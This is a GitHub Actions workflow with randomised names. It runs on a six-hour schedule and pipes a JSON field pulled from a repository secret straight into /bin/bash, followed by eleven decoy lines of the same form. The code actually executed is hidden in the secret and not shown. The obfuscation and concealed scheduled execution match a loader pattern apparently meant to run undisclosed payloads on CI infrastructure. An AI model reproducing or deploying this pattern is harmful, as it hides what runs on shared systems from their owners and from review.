name: dongxinchang5647
on:
  workflow_dispatch:
  schedule:
    - cron: '12 4/6 * * *'

jobs:  # 25822
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: dongxinchang5647
        env:
          ftkw3279: ${{ secrets.ftkw3279 }}
        run: |
          echo $ftkw3279 | jq -r .iimmx533 | /bin/bash
          echo $r17 | jq -r .qfrd37 | /bin/bash
          echo $ln6851 | jq -r .c3053 | /bin/bash
          echo $xynxv9 | jq -r .cr52435 | /bin/bash
          echo $e790 | jq -r .yowl123 | /bin/bash
          echo $qecoe40 | jq -r .d904 | /bin/bash
          echo $eqlt7 | jq -r .l4 | /bin/bash
          echo $rrqyb6 | jq -r .sbzi6 | /bin/bash
          echo $k6057 | jq -r .e59 | /bin/bash
          echo $rby398 | jq -r .vnjhu4 | /bin/bash
          echo $gzn4 | jq -r .ntxj0484 | /bin/bash
          echo $nm46543 | jq -r .ij9 | /bin/bash

